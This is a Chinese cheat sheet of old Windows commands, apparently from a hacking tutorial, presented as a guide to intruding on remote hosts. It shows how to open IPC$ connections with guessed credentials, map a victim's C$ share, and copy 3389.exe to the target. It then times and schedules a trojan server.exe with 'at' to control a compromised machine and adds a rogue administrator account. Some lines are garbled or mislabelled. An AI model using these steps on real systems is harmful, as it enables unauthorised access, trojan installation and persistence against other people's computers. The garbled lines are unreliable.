建立IPC连接 Net use //IP/ipc$ “” /user:username
例如:Net use //127.0.0.1/ipc$ 123456 /user :administrator 与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接
删除IPC$空连接 Net use //ip /del
例如:Net use //127.0.0.1 /del 删除与主机127.0.0.1已经建立Ipc$连接
启动关闭服务: Net start //查看已经开启服务
Net start servername
Net stop servername
例如:Net start telnet //开启telnet服务
Net stop telnet //关闭telnet服务
启动关闭共享
Net shate ipc$Content$nbsp; //开启ipc$默认共享
Net share ipc$ /del //关闭ipc$默认共享
Net share c=c:/ //完全共享c盘
Net share d=d:/ //删除完全共享d盘
映射硬盘
Net use z: //ip/c$
例如:Net use z: //127.0.0.1/c$Content$nbsp; //把127.0.0.1C盘映射成本机z盘
说明:映射成功,在我电脑里面多出硬盘Z,Z就是127.0.0.1C盘
Net use z: /del //断开映射
作用:直接复制文件到对方硬盘下
条件:必须与对方建立ipc$连接
远程复制文件Copy
Copy e:/3389.exe //127.0.0.1/c$Content$nbsp; //将本地E盘下3389.exe文件copy到对方系统C盘根目录
作用:把本地文件复制到对方硬盘
条件:必须与主机建立ipc$连接
查看远程系统的时间
Net time //IP
Net time //127.0.0.1 //查看远程主机127.0.0.1本地时间
作用:得到对方时间好自己计划任务种下木马准备
远程运行程序
At //ip time server.exe
At //127.0.0.1 12:30 c:/server.exe //让主机在中午12:30分运行已经复制到他C盘根目录下木马server.exe
作用:用木马服务端连接木马,使用图形方式控制肉鸡
添加管理员帐号:
Net user username 1234 /add //添加密码为1234名字为username用户
Net localgroup administrators juntuan /add //把username用户添加到管理员组
注意:有些系统管理员组不是administrators
Net user username 1234 //把用户username的密码修改成1233。
远程登陆主机telnet
telnet IP port
例如:telnet 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口(当目标主机端口是默认的23时不需要+端口即:telnet IP 就好)
传输文件命令ftp
输入ftp
输入:open IP port
例如:open 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口
开启windows系统自带ftp服务:Net start msftppsvc
查看文件夹属性cacls
Cacls xiaod //查看xiaod这个文件夹的属性
参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)
Del删除文件命令
进入你想删除文件目录
Del xiaod.txt //删除xiaod.txt文件
Del xiaod.txt /f //强制删除xiaod.txt文件(当该文件无法正常删除的时候使用该命令)
Finger是信息刺探命令在对方开启79端口时使用
Finger –l user @computer
参数详解: -l长列表格式显示消息 User指定用户信息
条件:对方必须安装tcp/ip协议
文件写入命令echo:
Echo 你好 > index.htm //用你好覆盖index.htm内容
Echo 你好 >>index.htm //将“你好”添加到index.htm
写入注册表文件_regedit
Regedit /s filename.reg //s是写入参数
端口映射_chgport
Chgport 3=5 //将端口3映射到5
Chgport /d* //删除所有端口映射
文件映射subst
Subst b:/ c:/winnt //访问硬盘B就是访问c:/winnt目录
查看当前正在使用的帐号:
Query session //查看帐号
踢掉指定用户:
Logoff id //注意ID,是在用query session查看到用户ID不是用户名。
发送消息给某用户或者内网主机
Net send hostname or /IP message
例如:net send xiaod or /127.0.0.1 hello!
